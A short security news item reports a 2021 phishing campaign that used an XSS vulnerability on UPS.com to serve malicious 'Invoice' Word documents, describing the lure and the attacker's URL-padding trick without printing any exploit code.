Security News > 2021 > August > Phishing campaign uses UPS.com XSS vuln to distribute malware
A clever UPS phishing campaign utilized an XSS vulnerability in UPS.com to push fake and malicious 'Invoice' Word documents.
The phishing scam was first discovered by security research Daniel Gallagher and pretended to be an email from UPS stating that a package had an "Exception" and needs to be picked up by the customer.
The base64 string contains a comment from the threat actor who helpfully explains that it is used to make the URL longer to hide an XSS exploit query parameter appended to the end of the URL. 1 jU57 N33d 70 m4K3 7h15 URL 4 l177l3 L0n93r 70 H1D3 n3x7 qU3rY P4R4M, y0u 4LR34Dy Kn0w WhY ;). This comment is interesting, as it's not common for threat actors to explain why an URL is created a certain way for a phishing attack.
The Cloudflare worker script injected by the XSS vulnerability will cause the UPS website to display a downloading page, as shown below.
This phishing campaign is so clever because a user visiting the URL will see a legitimate ups.com URL prompting a download of an invoice.
While the email sender clearly showed a suspicious domain, as the XSS vulnerability allowed the URL and download page to appear legitimately from UPS, many people would have fallen for this scam.